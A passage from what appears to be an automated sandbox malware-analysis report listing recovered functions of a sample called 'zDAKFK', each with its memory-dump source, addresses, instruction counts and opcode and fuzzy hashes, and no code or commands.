                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b4d9f9a38429ae89c06413438b58fff58e8dbbb8bd8c1e78ade75becb848776b
                                                                                                                                                                      • Instruction ID: a1cbe6cef03129960d122032f7fcfa2aa9a332d76279ab70b4302972b82680b9
                                                                                                                                                                      • Opcode Fuzzy Hash: b4d9f9a38429ae89c06413438b58fff58e8dbbb8bd8c1e78ade75becb848776b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F418E30A00245CFDB15EB68C595B9DBBF2EF85308F1484ACD046AB3A6DB75ED06CB51
                                                                                                                                                                      Function 04A9FDD0 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 67791906d7776d897eea6a1b64b526a7ae516b932b753e89b73e6968b4ea378d
                                                                                                                                                                      • Instruction ID: 12b246302891072e7778897cf153c656d656e2712e6ed5bafdb32d5deba8a74e
                                                                                                                                                                      • Opcode Fuzzy Hash: 67791906d7776d897eea6a1b64b526a7ae516b932b753e89b73e6968b4ea378d
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F4155397105018FCB05DF28C488AAE7BF6FF8AA05B1544E9E506CB3B2CB31ED048B51
                                                                                                                                                                      Function 04A99B00 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cd2f592dd51f19d64eebf0f47fdae0fec95336e16fdf7d6e6e2434ab92d3f0e1
                                                                                                                                                                      • Instruction ID: 0337d3ba22f025350fc394214e9763ebcdf352ab9d9e1353331a77ba4681337d
                                                                                                                                                                      • Opcode Fuzzy Hash: cd2f592dd51f19d64eebf0f47fdae0fec95336e16fdf7d6e6e2434ab92d3f0e1
                                                                                                                                                                      • Instruction Fuzzy Hash: B3318DB0A01602AFDB24DF2AC540A6BBBF5FF88714B1581ADC4499B760DB34FC41CB90
                                                                                                                                                                      Function 04A9FDE0 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8624ad609c9bf9d40ff533148a24b824c0c88133669a17cc902c4a49ed73764d
                                                                                                                                                                      • Instruction ID: cab0877011af73b70ba4c444fd9237fd85f9517a18aaea4d17d67642df90842b
                                                                                                                                                                      • Opcode Fuzzy Hash: 8624ad609c9bf9d40ff533148a24b824c0c88133669a17cc902c4a49ed73764d
                                                                                                                                                                      • Instruction Fuzzy Hash: 963132387105018FCB18DF29C488A6E7BF6FF8AA05B5544E9E106CB3B2CB70EC008B91
                                                                                                                                                                      Function 04A9A1D7 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6be6578fae58f2580bdf8d766f0101be3b36b1a2b924aaa6e5b5bf13dc0c4d6e
                                                                                                                                                                      • Instruction ID: a0b921afe7ca8e6137b437accba64899560c1bd864f653d83aae8f41c4144ff4
                                                                                                                                                                      • Opcode Fuzzy Hash: 6be6578fae58f2580bdf8d766f0101be3b36b1a2b924aaa6e5b5bf13dc0c4d6e
                                                                                                                                                                      • Instruction Fuzzy Hash: 39410875A0024ADFCB44DF68D88499EFBF5FF89310B14C699E918AB311E730A985CF90
                                                                                                                                                                      Function 04A9729C Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3bbb072c1bb673603c6191dae6a6fba0e5fd482bee66ce1e906914b0728eaa33
                                                                                                                                                                      • Instruction ID: 2584ee5aebd7e299a84c5f697582d0e9f70de3c5fb786d2792eca3c566f59ae1
                                                                                                                                                                      • Opcode Fuzzy Hash: 3bbb072c1bb673603c6191dae6a6fba0e5fd482bee66ce1e906914b0728eaa33
                                                                                                                                                                      • Instruction Fuzzy Hash: 2341CEB0D103189FDB14DFAAC884A9EFBF1BF49714F20822AE418BB210D774A845CF91
                                                                                                                                                                      Function 04A93298 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: af9c326d9ac4e137e06e82c845ce371e23a6c191ae4e534c16d0e7bcf6a4b385
                                                                                                                                                                      • Instruction ID: a911eeda1f4bf155ad9764990d90c0964e8e2006e50fbd56b42f79ee1f0261e3
                                                                                                                                                                      • Opcode Fuzzy Hash: af9c326d9ac4e137e06e82c845ce371e23a6c191ae4e534c16d0e7bcf6a4b385
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C319C35E043018BEB05AF29D8447997BF1FF89204F0986B9DC49AF346EB31A854CB61
                                                                                                                                                                      Function 04A91C4C Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5f088f536f845ca94baaf702a45ebca660d82ecf67c29238c92b232faaf62a2a
                                                                                                                                                                      • Instruction ID: 3a8a9c8ac54bc54f0e5cf7dbd51a42762905c5732d37a66c28ae04fde375ecd2
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f088f536f845ca94baaf702a45ebca660d82ecf67c29238c92b232faaf62a2a
                                                                                                                                                                      • Instruction Fuzzy Hash: 56316D35A102018BEF15EF69D88469A77F2FF89314F098579DD096F24AEF31A854CB50
                                                                                                                                                                      Function 04A9A1E8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0bd9f3a314b28941433b89ea19d1c1066c3932c1273f0232830394ddc923d4b8
                                                                                                                                                                      • Instruction ID: 45e5f12ba7d0e9330a97d4e78d8108a477afe378ebc92c600c99355fd1349164
                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd9f3a314b28941433b89ea19d1c1066c3932c1273f0232830394ddc923d4b8
                                                                                                                                                                      • Instruction Fuzzy Hash: A541E575A0020ADFCB44DF69D88499EFBF5FF89314B14C659E918AB311E730A985CF90
                                                                                                                                                                      Function 04A9E713 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 308e30512d04629d21b42207572c6ae7fdde0396687b97808ef1f8b47625b87d
                                                                                                                                                                      • Instruction ID: 7ca4b78f83037a776c6f941bd3f3814228bdeaa4fe0a45c3fb5fa838f1b2eaa8
                                                                                                                                                                      • Opcode Fuzzy Hash: 308e30512d04629d21b42207572c6ae7fdde0396687b97808ef1f8b47625b87d
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B314B75A01208AFDF10DF99D584BDEBBF2FF88310F108069E905A7391DA72AD41CB91
                                                                                                                                                                      Function 04A9AEE4 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6b275252ac95797adff78c66f6113859d6fc75de1b6b27aedcc867ba3548764d
                                                                                                                                                                      • Instruction ID: 540a12260a48b14f31bb58fae7b83e9bb5339d0df28feb1b3db0d9b77ade64e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b275252ac95797adff78c66f6113859d6fc75de1b6b27aedcc867ba3548764d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5121D3363506008FDB14DF2CD8886697BE5FFC5721B1984B5E50ACF3A6DA35EC048BA0
                                                                                                                                                                      Function 04A92D86 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 488082e0debca2a7b316440007a790d6f739f7420a076b1f3aae7091852d8419
                                                                                                                                                                      • Instruction ID: 65872de12dfacd72c770919faadc5e4de4d7e9075bc5e5ad3e2382e71dade0b7
                                                                                                                                                                      • Opcode Fuzzy Hash: 488082e0debca2a7b316440007a790d6f739f7420a076b1f3aae7091852d8419
                                                                                                                                                                      • Instruction Fuzzy Hash: D8311236B142199FDB14DF69C884BADBBF5BF89704F5844A9E501DB2A2DB71EC00CB50
                                                                                                                                                                      Function 04A984A9 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e1e759136c3c9845f54a634a21cfacf23a940ac7f4de63d2d7708dc828afc4aa
                                                                                                                                                                      • Instruction ID: 7105df30b5c3df3034c73802a78cab07c614803a5621a213b889bf2136f8518f
                                                                                                                                                                      • Opcode Fuzzy Hash: e1e759136c3c9845f54a634a21cfacf23a940ac7f4de63d2d7708dc828afc4aa
                                                                                                                                                                      • Instruction Fuzzy Hash: B221ADB5E101459FDF51EFA98D409AFBBFAAFC9204F10805AE415E7251EB70AE05CBA0
                                                                                                                                                                      Function 04A92FF1 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ebcbad5bf80d7bb6bddcded4405d310cba345864d7e43761bf8cb23608ce59b2
                                                                                                                                                                      • Instruction ID: 73d1c6ebe6c31271e607a5897b25047658aceb6940d0f44f6956c1cdaf5a4d82
                                                                                                                                                                      • Opcode Fuzzy Hash: ebcbad5bf80d7bb6bddcded4405d310cba345864d7e43761bf8cb23608ce59b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 2B2156347502105FFB086B68C455B6E77E6AFC9B08F1440ADE546CF7E6CEA5EC028791
                                                                                                                                                                      Function 04A97EC8 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 926f3d5f67c71e84f267bbcf5ddb84ebcea406c73cb0ca47a98aab6f15d92642
                                                                                                                                                                      • Instruction ID: c7f7540ed538e437473d85427f18dd137b46c0af1129132d0db8d815dab58f4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 926f3d5f67c71e84f267bbcf5ddb84ebcea406c73cb0ca47a98aab6f15d92642
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C21D375A102068AEF05DF6989406EEBBF2AF88304B14406AE405F7291E7349E05C7B2
                                                                                                                                                                      Function 04A981C3 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6ad6c0066bc28f2977a9ed1354f019b544ef6b393a64126d1ae9af438c4f9432
                                                                                                                                                                      • Instruction ID: 414412a6b6f9cb955523a544f10621859a824f0f1edab215dfebbee62ca8c5d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ad6c0066bc28f2977a9ed1354f019b544ef6b393a64126d1ae9af438c4f9432
                                                                                                                                                                      • Instruction Fuzzy Hash: C83138B0D05208DFDF10DFA4D448A9DBBF1EF09318F24815AD809AB251D7796D45CB61
                                                                                                                                                                      Function 008ED4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766232691.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8ed000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0e58b94346c74e01fb01db897d9047f36bed19800cdeeb22c31f49436e860a1a
                                                                                                                                                                      • Instruction ID: 900a59333288efdfe501a2735c2c5f80b1aac0d99d27823064260924e3d7c263
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e58b94346c74e01fb01db897d9047f36bed19800cdeeb22c31f49436e860a1a
                                                                                                                                                                      • Instruction Fuzzy Hash: 53213472504384DFCB05DF15D9C0B2BBF65FB98318F20C569E8098B256C336D85ACBA2
                                                                                                                                                                      Function 04A93000 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4a62a1dfb92e53e3960b97bbff8aca0454b1f179c42c7e07acee6a8c8934bd69
                                                                                                                                                                      • Instruction ID: 31934b2f41eb535e07333ac9bc05d62a08d095abe20a40346505ba7009c49d48
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a62a1dfb92e53e3960b97bbff8aca0454b1f179c42c7e07acee6a8c8934bd69
                                                                                                                                                                      • Instruction Fuzzy Hash: 292124347606105FEB08AB28C459F6E76EAAFC8B05F10406DE506CB7E6CEB6EC418791
                                                                                                                                                                      Function 04A9EE00 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f76ac7fb97f764d69039d31d95d2ab07d06fd152a1b52dbf4f80653deb3aa781
                                                                                                                                                                      • Instruction ID: f1ff8ebd30146b9d50a6c0028d29155409dc527a2c0e635a1d97bd8b90d400a7
                                                                                                                                                                      • Opcode Fuzzy Hash: f76ac7fb97f764d69039d31d95d2ab07d06fd152a1b52dbf4f80653deb3aa781
                                                                                                                                                                      • Instruction Fuzzy Hash: 2B218E71A007558FEF15EF69C58029ABBE1EF85314B10897AD849AF346DB31FC85CB81
                                                                                                                                                                      Function 008FD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766294322.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8fd000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4c97e77f110a0c173486c8e44e58f122ff4be602f29d4b8cfe577216ef6c2e75
                                                                                                                                                                      • Instruction ID: 419fff927b7d1e2f2e67b815db0a6f8000a29acfd0dbfd396e1d7343e9dadf39
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c97e77f110a0c173486c8e44e58f122ff4be602f29d4b8cfe577216ef6c2e75
                                                                                                                                                                      • Instruction Fuzzy Hash: 5221F571504708DFDB14DF24D584B26BB66FBC4314F20C569DB098B356CB3AD847CA61
                                                                                                                                                                      Function 008FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766294322.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8fd000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                                                                                                                                      • Instruction ID: 8870051f791399723db60cd4a628c567c502f68e1f8be95a597935cb3e1e66e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E210771504308DFDB05DF24D5C4B36BBA6FB84318F20C56DDB098B255C336E846CAA1
                                                                                                                                                                      Function 04A9E260 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 264043bebb3191551735ff3ee51d6774561d05643f0464023cb81117ec580136
                                                                                                                                                                      • Instruction ID: 325ce3051a1fd9ff1b4497e0fb8c54ac0c0bc715245dc8c2cdfe49323b7501d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 264043bebb3191551735ff3ee51d6774561d05643f0464023cb81117ec580136
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B11BF307142101BEB09B768C4257AF33D6ABC9B18F00446DE556DB3D6CFA5AD0287D6
                                                                                                                                                                      Function 04A9E240 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 93db8b0f4811cf269e14bb1487eacff68c08e90f8144e0d33475a48d417f6d3b
                                                                                                                                                                      • Instruction ID: cdb2bdbcbfc80ad6ceef13e066da56e7ae2b7b8382c9258c97ead7a6b6109a13
                                                                                                                                                                      • Opcode Fuzzy Hash: 93db8b0f4811cf269e14bb1487eacff68c08e90f8144e0d33475a48d417f6d3b
                                                                                                                                                                      • Instruction Fuzzy Hash: C911DD347086100BEB09BB3894557AE37D2ABC9708F0040AEE196CF7D6CFA5AD028796
                                                                                                                                                                      Function 04A9BFEF Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 07e948ba1f754d79a74242b8bfe062a6333f48308accc7ee3c6e9ebadef83f41
                                                                                                                                                                      • Instruction ID: b304b16f219a443301c4167d09392a7184bd9b503f928c68f1278fdd9dccced9
                                                                                                                                                                      • Opcode Fuzzy Hash: 07e948ba1f754d79a74242b8bfe062a6333f48308accc7ee3c6e9ebadef83f41
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C1136B26006819FDB15EB38D855B9AB7F1EFC1314B00C47DE0198B652EB32ED4AC751
                                                                                                                                                                      Function 04A90880 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0bcb4e4d529a2d8e7a56d5f47cb5419a3304531805ed88c1ab1abd8d1b0d723d
                                                                                                                                                                      • Instruction ID: a183d55c6890dae67ba6eb0f9edc743ac11db89b194752af01bb04b4e8362eb1
                                                                                                                                                                      • Opcode Fuzzy Hash: 0bcb4e4d529a2d8e7a56d5f47cb5419a3304531805ed88c1ab1abd8d1b0d723d
                                                                                                                                                                      • Instruction Fuzzy Hash: AA113231B05B018BEB34DF29E491B27B3F2BB84780F140A2DE096CBA40D734F9088B91
                                                                                                                                                                      Function 04A9E270 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: beb0c379d7a7b81dde7b77c2dfb2538e1a2738d3c6b9f916e42b9c7af0de85d8
                                                                                                                                                                      • Instruction ID: e371752652a9db5f88356b976d74af3264f2fdb76879ea1213e98aa53a4ff92e
                                                                                                                                                                      • Opcode Fuzzy Hash: beb0c379d7a7b81dde7b77c2dfb2538e1a2738d3c6b9f916e42b9c7af0de85d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 181170307106105BEB09B768C425BAF72D6ABC8B18F00446DE5569B3D6CFA5AC4187D6
                                                                                                                                                                      Function 04A9B3A7 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
